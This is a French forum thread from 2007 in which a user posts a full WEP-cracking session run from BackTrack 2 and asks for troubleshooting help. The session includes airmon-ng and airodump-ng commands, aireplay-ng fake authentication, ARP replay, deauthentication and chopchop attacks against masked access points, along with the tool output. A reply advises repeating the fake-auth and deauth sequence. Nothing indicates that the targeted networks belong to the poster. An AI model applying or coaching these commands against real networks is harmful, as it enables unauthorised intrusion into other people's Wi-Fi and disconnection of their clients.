SVP, y a t'il une erreur? (Page 1) / Crack de clef wep / Forum d'entraide: tuto-fr.com

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 26-07-2007 01:43:40

kam
Membre
Inscription : 14-07-2007
Messages : 57

SVP, y a t'il une erreur?

Salut à tous,
Je n'arrive toujour pas à capturer des ivs, j'aimerai vous faire montrer la methode que j'emploi et s'il vous plait soyez patient et dite moi si je ne fait pas d'erreur quelque part. Merci d'avance.

Pour rappelle, mon materiel: pc, 512 ram, cd backtrack 2 final, carte wifi high power 500mw rtl8187,


Bien que j'ai 512 de ram je monte quand mème la partition fat32 et j'ai déjà essayer sans montage,

bt ~ # cd /mnt/hda5


bt hda5 # airmon-ng


Interface       Chipset         Driver

eth0            Broadcom        bcm43xx
wlan0           RTL8187         r8187


bt hda5 # airmon-ng start wlan0


Interface       Chipset         Driver

eth0            Broadcom        bcm43xx
wlan0           RTL8187         r8187 (monitor mode enabled)


bt hda5 # airodump-ng --write tuto wlan0


CH 14 ][ Elapsed: 20 s ][ 2007-07-25 00:49

BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

xx:xx:xx:xx:xx:xx  125       26        0    0   2  48  WEP  WEP         xxxxxx
xx:xx:xx:xx:xx:xx  102        7        0    0  10  54  WEP  WEP         xxxxxxxxxxxx
xx:xx:xx:xx:xx:xx   93       18        0    0  10  54  WEP  WEP         xxxxxxxxxxxx
xx:xx:xx:xx:xx:xx   77       11        7    0  11  11  WEP  WEP         xxxxxxxxxxxxxx

BSSID              STATION            PWR  Lost  Packets  Probes

xx:xx:xx:xx:xx:xx  xx:xx:xx:xx:xx:xx  115   132        7


bt hda5 # airodump-ng --write tuto --channel 11 --bssid xx:xx:xx:xx:xx:xx wlan0


CH  11 ][ Elapsed: 52 s ][ 2007-07-25 01:03

BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

xx:xx:xx:xx:xx:xx  108       31        4    0  11  11  WEP  WEP         xxxxxxxxxxxxxx

BSSID              STATION            PWR  Lost  Packets  Probes

xx:xx:xx:xx:xx:xx  xx:xx:xx:xx:xx:xx  121     0        4


changement de console tout en laissant celle là active



                                                    essid                 bssid                                station
bt hda5 # aireplay-ng -1 0 -e xxxxxxxxxxxxxx -a xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx wlan0


The interface MAC (xx:xx:xx:xx:xx:xx) doesn't match the specified MAC (-h).
        ifconfig wlan0 hw ether xx:xx:xx:xx:xx:xx
01:58:55  Sending Authentication Request
01:58:57  Sending Authentication Request
01:58:59  Sending Authentication Request
01:59:01  Sending Authentication Request
01:59:03  Sending Authentication Request
01:59:05  Sending Authentication Request
01:59:07  Sending Authentication Request

Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
      Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
      the transmit rate (iwconfig <iface> rate 1M).


vu que sur le tuto cette etape n'est pas indispensable je poursuit:

                                             essid                       bssid                           station
bt hda5 # aireplay-ng -3 -e xxxxxxxxxxxxxx -b xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx wlan0


The interface MAC (xx:xx:xx:xx:xx:xx) doesn't match the specified MAC (-h).
        ifconfig wlan0 hw ether xx:xx:xx:xx:xx:xx
Saving ARP requests in replay_arp-0725-010447.cap
You should also start airodump-ng to capture replies.
Read 3951 packets (got 0 ARP requests), sent 0 packets...



en parallele je lance une attaque sur une autre console:



bt hda5 # aireplay-ng -0 15 -a "bssid" wlan0

et/ou

bt hda5 # aireplay-ng -0 15 -a "bssid" -c "station" wlan0


NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
02:07:56  Sending DeAuth to broadcast -- BSSID: [xx:xx:xx:xx:xx:xx]
02:07:58  Sending DeAuth to broadcast -- BSSID: [xx:xx:xx:xx:xx:xx]
02:07:59  Sending DeAuth to broadcast -- BSSID: [xx:xx:xx:xx:xx:xx]
02:08:00  Sending DeAuth to broadcast -- BSSID: [xx:xx:xx:xx:xx:xx]
02:08:01  Sending DeAuth to broadcast -- BSSID: [xx:xx:xx:xx:xx:xx]
02:08:02  Sending DeAuth to broadcast -- BSSID: [xx:xx:xx:xx:xx:xx]
02:08:04  Sending DeAuth to broadcast -- BSSID: [xx:xx:xx:xx:xx:xx]
02:08:05  Sending DeAuth to broadcast -- BSSID: [xx:xx:xx:xx:xx:xx]
02:08:06  Sending DeAuth to broadcast -- BSSID: [xx:xx:xx:xx:xx:xx]
02:08:07  Sending DeAuth to broadcast -- BSSID: [xx:xx:xx:xx:xx:xx]
02:08:09  Sending DeAuth to broadcast -- BSSID: [xx:xx:xx:xx:xx:xx]
02:08:10  Sending DeAuth to broadcast -- BSSID: [xx:xx:xx:xx:xx:xx]
02:08:11  Sending DeAuth to broadcast -- BSSID: [xx:xx:xx:xx:xx:xx]
02:08:12  Sending DeAuth to broadcast -- BSSID: [xx:xx:xx:xx:xx:xx]
02:08:13  Sending DeAuth to broadcast -- BSSID: [xx:xx:xx:xx:xx:xx]


ça donne rien donc je lance aussi une attaque chopchop:




bt hda5 # aireplay-ng -4 wlan0 -a " a p " - h "s t a t i o n "


open(/dev/rtc) failed: Device or resource busy
The interface MAC (xx:xx:xx:xx:xx:xx) doesn't match the specified MAC (-h).
        ifconfig wlan0 hw ether xx:xx:xx:xx:xx:xx


        Size: 80, FromDS: 0, ToDS: 1 (WEP)

             BSSID  =  xx:xx:xx:xx:xx:xx
         Dest. MAC  =  xx:xx:xx:xx:xx:xx
        Source MAC  =  xx:xx:xx:xx:xx:xx

        0x0000:  0841 0201 0001 24c0 4750 0006 f404 2cdd  .A....$.GP....,.
        0x0010:  0001 24c0 4750 30d1 99dc 4100 151c d58d  ..$.GP0...A.....
        0x0020:  2773 375f fa5a e29b 426b 627c 101d 3daf  's7_.Z..Bkb|..=.
        0x0030:  a9ce eaf3 da01 7a3b 1858 bfa0 24c7 5559  ......z;.X..$.UY
        0x0040:  7f24 8bac 9906 9ce1 062f a046 fd5e 7de5  $......./.F.^}.

Use this packet ? y

Saving chosen packet in replay_src-0725-021742.cap

Sent 3755 packets, current guess: 9C...

The chopchop attack appears to have failed. Possible reasons:

    * You're trying to inject with an unsupported chipset (Centrino?).
    * The driver source wasn't properly patched for injection support.
    * You are too far from the AP. Get closer or reduce the send rate.
    * Target is 802.11g only but you are using a Prism2 or RTL8180.
    * The wireless interface isn't setup on the correct channel.
    * The client MAC you have specified is not currently authenticated.
      Try running another aireplay-ng to fake authentication (attack "-1").
    * The AP isn't vulnerable when operating in authenticated mode.
      Try aireplay-ng in non-authenticated mode instead (no -h option).


avec tout ça je n'arrive pas à capture d'ivs et si je laisse tourner l'ordi 24 heures j'ai au maximum 5 ivs, est-ce-que je fait une erreur quelque part ou s'est bien comme ça qu'il faut s'y prendre alors ça serai comme dit dans le tuto la faute à pas de chance?

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 26-07-2007 09:14:58

Cpt_Love
Invité

Re : SVP, y a t'il une erreur?

J'aurais dit la faute à la distance mais avec les power que tu as sad

T'as essayé de te mettre plus pret, de baisser la vitesse de transfert (iwconfig wlan0 rate 1M) et aussi de faire une suite 2/3 fois de :

aireplay-ng -1 0 -e xxxxxxxxxxxxxx -a xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx wlan0
aireplay-ng -0 15 -a "bssid" wlan0
aireplay-ng -1 60 -e xxxxxxxxxxxxxx -a xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx wlan0

En voyant le nombre de beacons que tu as je me dit qu'il y a un pb, moi c'est 200 à 300 beacons minutes que je recois avec un pwr de 30 hmm

#3 26-07-2007 15:01:25

kam
Membre
Inscription : 14-07-2007
Messages : 57

Re : SVP, y a t'il une erreur?

Salut, de baissé la vitesse de transfère (iwconfig wlan0 rate 1M) avec -1 0 non et est-ce-que s'est la valeur -x à rajouter car avec -3 j'ai essayer d'augmenté ou de diminué la vitesse avec -x XXX sans resultat , sinon 2/3 fois -1 0, -0 15, -1 30 oui mais je n'ai pas essayer -1 60. Le lendemain si je veut reprendre le transfere de paquets avec aireplay-ng -3 avec le fichier cap de la veille aireplay-ng me donne un nouveau ficher cap d'enregistrement, est-ce normal?
Merci.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
1 2111 17-04-2010 17:11:32 par M1ck3y
8 1890 06-04-2008 13:21:32 par jerguitariste
0 510 21-10-2007 00:22:32 par jerguitariste
5 999 23-09-2007 20:24:53 par Lokomass
1 1108 13-07-2007 12:58:02 par skram